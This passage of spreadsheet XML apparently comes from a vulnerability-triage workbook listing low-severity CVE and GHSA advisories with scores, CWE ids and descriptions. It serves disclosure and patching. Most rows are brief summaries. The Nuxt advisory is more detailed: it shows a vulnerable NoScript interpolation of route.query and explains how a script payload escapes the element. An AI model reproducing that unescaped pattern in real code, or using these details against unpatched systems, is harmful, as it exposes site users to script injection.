      </c>
      <c r="E1240" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1240" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1240" s="5" t="inlineStr"/>
      <c r="H1240" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1240" s="5" t="inlineStr"/>
      <c r="J1240" s="5" t="inlineStr"/>
      <c r="K1240" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1240" s="5" t="inlineStr"/>
      <c r="M1240" s="5" t="inlineStr"/>
      <c r="N1240" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1240" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1240" s="5" t="inlineStr"/>
      <c r="Q1240" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1240" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in ServiceWorker in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Low)</t>
        </is>
      </c>
      <c r="S1240" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87614</t>
        </is>
      </c>
    </row>
    <row r="1241">
      <c r="A1241" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1241" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1241" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87652</t>
        </is>
      </c>
      <c r="D1241" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1241" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1241" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1241" s="5" t="inlineStr"/>
      <c r="H1241" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1241" s="5" t="inlineStr"/>
      <c r="J1241" s="5" t="inlineStr"/>
      <c r="K1241" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1241" s="5" t="inlineStr"/>
      <c r="M1241" s="5" t="inlineStr"/>
      <c r="N1241" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1241" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1241" s="5" t="inlineStr"/>
      <c r="Q1241" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R1241" s="5" t="inlineStr">
        <is>
          <t>Incorrect authorization in PushAPI in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to bypass web origin policy via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1241" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87652</t>
        </is>
      </c>
    </row>
    <row r="1242">
      <c r="A1242" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1242" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1242" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87657</t>
        </is>
      </c>
      <c r="D1242" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E1242" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1242" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1242" s="5" t="inlineStr"/>
      <c r="H1242" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1242" s="5" t="inlineStr"/>
      <c r="J1242" s="5" t="inlineStr"/>
      <c r="K1242" s="5" t="inlineStr">
        <is>
          <t>google:chrome</t>
        </is>
      </c>
      <c r="L1242" s="5" t="inlineStr"/>
      <c r="M1242" s="5" t="inlineStr"/>
      <c r="N1242" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1242" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1242" s="5" t="inlineStr"/>
      <c r="Q1242" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R1242" s="5" t="inlineStr">
        <is>
          <t>Use after free in V8 in Google Chrome prior to 153.0.8010.36 allowed a remote attacker who had compromised the renderer process to read memory inside the sandbox via a crafted HTML page. (Chromium security severity: Medium)</t>
        </is>
      </c>
      <c r="S1242" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87657</t>
        </is>
      </c>
    </row>
    <row r="1243">
      <c r="A1243" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1243" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1243" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87876</t>
        </is>
      </c>
      <c r="D1243" s="5" t="n">
        <v>3</v>
      </c>
      <c r="E1243" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1243" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1243" s="5" t="inlineStr"/>
      <c r="H1243" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1243" s="5" t="inlineStr"/>
      <c r="J1243" s="5" t="inlineStr"/>
      <c r="K1243" s="5" t="inlineStr"/>
      <c r="L1243" s="5" t="inlineStr"/>
      <c r="M1243" s="5" t="inlineStr"/>
      <c r="N1243" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1243" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1243" s="5" t="inlineStr"/>
      <c r="Q1243" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="R1243" s="5" t="inlineStr">
        <is>
          <t>Two case-insensitive comparisons on request-derived usernames outside the main authorization path in CUPS's scheduler (printer ACL validation and private-attribute filtering) could allow bypass of username-based access controls in certain configurations.</t>
        </is>
      </c>
      <c r="S1243" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87876</t>
        </is>
      </c>
    </row>
    <row r="1244">
      <c r="A1244" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1244" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1244" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87525</t>
        </is>
      </c>
      <c r="D1244" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E1244" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1244" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1244" s="5" t="inlineStr"/>
      <c r="H1244" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1244" s="5" t="inlineStr"/>
      <c r="J1244" s="5" t="inlineStr"/>
      <c r="K1244" s="5" t="inlineStr">
        <is>
          <t>google:chrome, microsoft:windows</t>
        </is>
      </c>
      <c r="L1244" s="5" t="inlineStr"/>
      <c r="M1244" s="5" t="inlineStr"/>
      <c r="N1244" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1244" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1244" s="5" t="inlineStr"/>
      <c r="Q1244" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="R1244" s="5" t="inlineStr">
        <is>
          <t>Out of bounds read in Chromoting in Google Chrome on on Windows prior to 153.0.8010.36 allowed a local attacker to read memory outside the sandbox via a local program. (Chromium security severity: High)</t>
        </is>
      </c>
      <c r="S1244" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87525</t>
        </is>
      </c>
    </row>
    <row r="1245">
      <c r="A1245" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1245" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1245" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86424</t>
        </is>
      </c>
      <c r="D1245" s="5" t="n">
        <v>2.5</v>
      </c>
      <c r="E1245" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1245" s="5" t="inlineStr"/>
      <c r="H1245" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1245" s="5" t="inlineStr"/>
      <c r="J1245" s="5" t="inlineStr"/>
      <c r="K1245" s="5" t="inlineStr">
        <is>
          <t>imagemagick:imagemagick</t>
        </is>
      </c>
      <c r="L1245" s="5" t="inlineStr"/>
      <c r="M1245" s="5" t="inlineStr"/>
      <c r="N1245" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1245" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P1245" s="5" t="inlineStr"/>
      <c r="Q1245" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="R1245" s="5" t="inlineStr">
        <is>
          <t>ImageMagick before 7.1.2-30 and 6.9.13-55 contains a time-of-check-time-of-use (TOCTOU) vulnerability in the video decoder that allows attackers to bypass path policy write restrictions via symlink swaps. An attacker can replace a symlink between policy validation (check-time) and the file write operation (use-time) to write to policy-denied locations.</t>
        </is>
      </c>
      <c r="S1245" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86424</t>
        </is>
      </c>
    </row>
    <row r="1246">
      <c r="A1246" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1246" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1246" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80239</t>
        </is>
      </c>
      <c r="D1246" s="5" t="n">
        <v>2.4</v>
      </c>
      <c r="E1246" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1246" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G1246" s="5" t="inlineStr"/>
      <c r="H1246" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1246" s="5" t="inlineStr"/>
      <c r="J1246" s="5" t="inlineStr"/>
      <c r="K1246" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L1246" s="5" t="inlineStr"/>
      <c r="M1246" s="5" t="inlineStr"/>
      <c r="N1246" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1246" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1246" s="5" t="inlineStr"/>
      <c r="Q1246" s="5" t="inlineStr">
        <is>
          <t>CWE-1258</t>
        </is>
      </c>
      <c r="R1246" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Exposure of Sensitive System Information Due to Uncleared Debug Information vulnerability. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to information exposure.</t>
        </is>
      </c>
      <c r="S1246" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80239</t>
        </is>
      </c>
    </row>
    <row r="1247">
      <c r="A1247" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1247" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1247" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56317</t>
        </is>
      </c>
      <c r="D1247" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E1247" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1247" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1247" s="5" t="inlineStr"/>
      <c r="H1247" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1247" s="5" t="inlineStr"/>
      <c r="J1247" s="5" t="inlineStr"/>
      <c r="K1247" s="5" t="inlineStr"/>
      <c r="L1247" s="5" t="inlineStr">
        <is>
          <t>npm:nuxt</t>
        </is>
      </c>
      <c r="M1247" s="5" t="inlineStr">
        <is>
          <t>3.21.7, 4.4.7</t>
        </is>
      </c>
      <c r="N1247" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1247" s="5" t="inlineStr"/>
      <c r="P1247" s="5" t="inlineStr"/>
      <c r="Q1247" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1247" s="5" t="inlineStr">
        <is>
          <t>### Impact
Nuxt's globally registered `&lt;NoScript&gt;` component (from `@unhead/vue` head components, re-exported by Nuxt) wrote its default-slot content to the `innerHTML` of the `&lt;noscript&gt;` head tag, bypassing the HTML escaping that `{{ }}` interpolation normally applies in Vue templates.
Applications that placed untrusted, attacker-controllable data inside a `&lt;NoScript&gt;` slot, for example:
```vue
&lt;NoScript&gt;{{ route.query.banner }}&lt;/NoScript&gt;
```
would emit that value unescaped inside `&lt;noscript&gt;` in the server-rendered HTML. With scripting enabled, the HTML parser treats `&lt;noscript&gt;` content in `&lt;head&gt;` under the "in head noscript" insertion mode: any tag other than `link`, `meta`, `noframes`, or `style` implicitly closes `&lt;noscript&gt;` and is re-processed in the head. A payload such as `&lt;script&gt;...&lt;/script&gt;` therefore escapes the element and executes in the document context.
Sibling head components (`&lt;Style&gt;`, `&lt;Title&gt;`) were not affected because they already routed slot text through the safe `textContent` path.
### Affected versions
All currently supported versions of `nuxt` that ship the `&lt;NoScript&gt;` global component.
### Patches
Fixed in `nuxt@4.4.7` (commit [`4b054e9d`](https://github.com/nuxt/nuxt/commit/4b054e9d95f8daf366cb144b52782047c511a66e)) and backported to `nuxt@3.21.7` (commit [`7fea9fd6`](https://github.com/nuxt/nuxt/commit/7fea9fd687f1dacbfb63db5fae5839896b017a0e)). The fix escapes `&lt;NoScript&gt;` slot content with `escapeHtml` from `@vue/shared` and writes it to `textContent` rather than `innerHTML`. Slot content is now rendered as text; intentional markup inside `&lt;NoScript&gt;` is no longer parsed as HTML.
### Workarounds
Until you can upgrade:
- Do not interpolate untrusted input into `&lt;NoScript&gt;` slots. Replace `&lt;NoScript&gt;{{ x }}&lt;/NoScript&gt;` with a static string, or sanitise / HTML-escape `x` at the source.
- If you must render dynamic noscript content, write the tag yourself via `useHead({ noscript: [{ textContent: escapedValue }] })` after escaping `escapedValue`.
### Credit
Reported to Anthropic's coordinated vulnerability disclosure pipeline by Claude (Anthropic's AI assistant) and triaged by the Anthropic security team. Reference: ANT-2026-4NJYDFFM.
Independently reported by [@alcls01111](https://github.com/alcls01111) via GitHub's coordinated disclosure flow (`GHSA-8grp-wcq9-925q`), closed as a duplicate of this advisory.</t>
        </is>
      </c>
      <c r="S1247" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56317</t>
        </is>
      </c>
    </row>
    <row r="1248">
      <c r="A1248" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1248" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1248" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86198</t>
        </is>
      </c>
      <c r="D1248" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E1248" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1248" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G1248" s="5" t="inlineStr"/>
      <c r="H1248" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1248" s="5" t="inlineStr"/>
      <c r="J1248" s="5" t="inlineStr"/>
      <c r="K1248" s="5" t="inlineStr"/>
      <c r="L1248" s="5" t="inlineStr"/>
      <c r="M1248" s="5" t="inlineStr"/>
      <c r="N1248" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1248" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1248" s="5" t="inlineStr"/>
      <c r="Q1248" s="5" t="inlineStr">
        <is>
          <t>CWE-837</t>
        </is>
      </c>
      <c r="R1248" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.44.2 fail to properly validate multiple ResourcePackClientResponsePacket packets with STATUS_COMPLETED status during resource pack handling. Malicious clients can send batches of these packets to repeatedly trigger pre-spawn progression, creating duplicate Player objects and amplifying memory consumption and network traffic.</t>
        </is>
      </c>
      <c r="S1248" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86198</t>
        </is>
      </c>
    </row>
    <row r="1249">
      <c r="A1249" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1249" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C1249" s="5" t="inlineStr">
        <is>
          <t>GHSA-xppm-jmw6-fhmf</t>
        </is>
      </c>
      <c r="D1249" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E1249" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1249" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G1249" s="5" t="inlineStr"/>
      <c r="H1249" s="5" t="inlineStr"/>
      <c r="I1249" s="5" t="inlineStr"/>
      <c r="J1249" s="5" t="inlineStr"/>
      <c r="K1249" s="5" t="inlineStr"/>
      <c r="L1249" s="5" t="inlineStr">
        <is>
          <t>npm:nuxt</t>
        </is>
      </c>
      <c r="M1249" s="5" t="inlineStr">
        <is>
          <t>3.21.7, 4.4.7</t>
        </is>
      </c>
      <c r="N1249" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O1249" s="5" t="inlineStr"/>
      <c r="P1249" s="5" t="inlineStr"/>
      <c r="Q1249" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1249" s="5" t="inlineStr">
        <is>
          <t>### Duplicate Advisory
This advisory has been withdrawn because it is a duplicate of GHSA-m3q2-p4fw-w38m. This link is maintained to preserve external references.
### Original Description
Nuxt before 4.4.7 (and the 3.x branch before 3.21.7) contains a cross-site scripting vulnerability in the NoScript component that writes slot content to innerHTML without escaping. Attackers can inject malicious scripts through untrusted data in NoScript slots, such as route.query parameters, which execute in the document context when the noscript tag is implicitly closed by script tags.</t>
        </is>
      </c>
      <c r="S1249" s="6" t="inlineStr">
        <is>
          <t>https://github.com/advisories/GHSA-xppm-jmw6-fhmf</t>
        </is>
      </c>
    </row>
    <row r="1250">
      <c r="A1250" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1250" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1250" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77648</t>
        </is>
      </c>
      <c r="D1250" s="5" t="n">
        <v>2.2</v>
      </c>
      <c r="E1250" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1250" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1250" s="5" t="inlineStr"/>
      <c r="H1250" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1250" s="5" t="inlineStr"/>
      <c r="J1250" s="5" t="inlineStr"/>
      <c r="K1250" s="5" t="inlineStr"/>
      <c r="L1250" s="5" t="inlineStr"/>
      <c r="M1250" s="5" t="inlineStr"/>
      <c r="N1250" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1250" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P1250" s="5" t="inlineStr"/>
      <c r="Q1250" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1250" s="5" t="inlineStr">
        <is>
          <t>In OpenStack Glance through 32.0.0, the /v2/tasks API accepts type=import tasks that
bypass import_filtering_opts, allowing an admin to fetch internal
URLs from the Glance service network (aka SSRF), as long as https:// or http:// is used. This API has been available only to admins since Xena, and it has been deprecated for several releases.</t>
        </is>
      </c>
      <c r="S1250" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77648</t>
        </is>
      </c>
    </row>
    <row r="1251">
      <c r="A1251" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1251" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1251" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86744</t>
        </is>
      </c>
      <c r="D1251" s="5" t="n">
        <v>2.2</v>
      </c>
      <c r="E1251" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G1251" s="5" t="inlineStr"/>
      <c r="H1251" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1251" s="5" t="inlineStr"/>
      <c r="J1251" s="5" t="inlineStr"/>
      <c r="K1251" s="5" t="inlineStr">
        <is>
          <t>snipeitapp:snipe-it</t>
        </is>
      </c>
      <c r="L1251" s="5" t="inlineStr"/>
      <c r="M1251" s="5" t="inlineStr"/>
      <c r="N1251" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1251" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1251" s="5" t="inlineStr"/>
      <c r="Q1251" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R1251" s="5" t="inlineStr">
        <is>
          <t>Snipe-IT 8.6.3 and earlier (and develop pre-release commits prior to the fix) contain a race condition in the asset checkout paths. Api\AssetsController::checkout() and Assets\AssetCheckoutController::store() call Asset::availableForCheckout() outside the mutation path and then invoke Asset::checkOut() without taking a row lock or re-checking availability, so two concurrent checkout requests for the same available asset can both observe it as available and both commit. This produces duplicate checkout-history rows, a doubled checkout_counter, and two CheckoutableCheckedOut events for a single-assignment asset, corrupting the audit trail and utilization/reconciliation reporting; the asset's final assigned_to remains singular, so the visible assignment stays intact. Exploitation requires an authenticated session holding the assets.checkout permission (or superuser) and precise concurrent timing. Fixed in 8.7.0.</t>
        </is>
      </c>
      <c r="S1251" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86744</t>
        </is>
      </c>
    </row>
    <row r="1252">
      <c r="A1252" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1252" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1252" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21109</t>
        </is>
      </c>
      <c r="D1252" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1252" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1252" s="5" t="inlineStr">
        <is>
          <t>mobile.security@samsung.com</t>
        </is>
      </c>
      <c r="G1252" s="5" t="inlineStr"/>
      <c r="H1252" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1252" s="5" t="inlineStr"/>
      <c r="J1252" s="5" t="inlineStr"/>
      <c r="K1252" s="5" t="inlineStr"/>
      <c r="L1252" s="5" t="inlineStr"/>
      <c r="M1252" s="5" t="inlineStr"/>
      <c r="N1252" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1252" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1252" s="5" t="inlineStr"/>
      <c r="Q1252" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R1252" s="5" t="inlineStr">
        <is>
          <t>Improper access control in Watch Plugin prior to Android Watch 17 allows local attackers to access sensitive information.</t>
        </is>
      </c>
      <c r="S1252" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21109</t>
        </is>
      </c>
    </row>
    <row r="1253">
      <c r="A1253" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1253" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1253" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72924</t>
        </is>
      </c>
      <c r="D1253" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1253" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1253" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1253" s="5" t="inlineStr"/>
      <c r="H1253" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1253" s="5" t="inlineStr"/>
      <c r="J1253" s="5" t="inlineStr"/>
      <c r="K1253" s="5" t="inlineStr"/>
      <c r="L1253" s="5" t="inlineStr"/>
      <c r="M1253" s="5" t="inlineStr"/>
      <c r="N1253" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1253" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P1253" s="5" t="inlineStr"/>
      <c r="Q1253" s="5" t="inlineStr">
        <is>
          <t>CWE-1327, CWE-668</t>
        </is>
      </c>
      <c r="R1253" s="5" t="inlineStr">
        <is>
          <t>GitHub CLI (gh) is GitHub's official command line tool. Versions 2.28.0 through 2.97.0 bind the local listener created by gh codespace ports forward to all available network interfaces by default. While port forwarding is active, a service in a Codespace can therefore become reachable through the user's non-loopback local IP addresses by other hosts that can route to the user's machine. This behavior does not change the GitHub-side visibility of the Codespaces port. Instead, it exposes the forwarded service through a wildcard-bound listener on the user's local machine, even when the source Codespaces port remains private. Exploitation requires a network-adjacent attacker to reach the victim's machine while forwarding is active. This issue is fixed in version 2.98.0.</t>
        </is>
      </c>
      <c r="S1253" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72924</t>
        </is>
      </c>
    </row>
    <row r="1254">
      <c r="A1254" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1254" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1254" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86170</t>
        </is>
      </c>
      <c r="D1254" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1254" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1254" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G1254" s="5" t="inlineStr"/>
      <c r="H1254" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1254" s="5" t="inlineStr"/>
      <c r="J1254" s="5" t="inlineStr"/>
      <c r="K1254" s="5" t="inlineStr"/>
      <c r="L1254" s="5" t="inlineStr"/>
      <c r="M1254" s="5" t="inlineStr"/>
      <c r="N1254" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1254" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P1254" s="5" t="inlineStr"/>
      <c r="Q1254" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-89</t>
        </is>
      </c>
      <c r="R1254" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in DefaultFuction CRM 1.0.0. The impacted element is an unknown function of the file /modules/orders/edit.php. This manipulation of the argument ID causes sql injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks.</t>
        </is>
      </c>
      <c r="S1254" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86170</t>
        </is>
      </c>
    </row>
    <row r="1255">
      <c r="A1255" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1255" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1255" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86215</t>
        </is>
      </c>
      <c r="D1255" s="5" t="n">
        <v>2.1</v>
      </c>
      <c r="E1255" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F1255" s="5" t="inlineStr">
        <is>
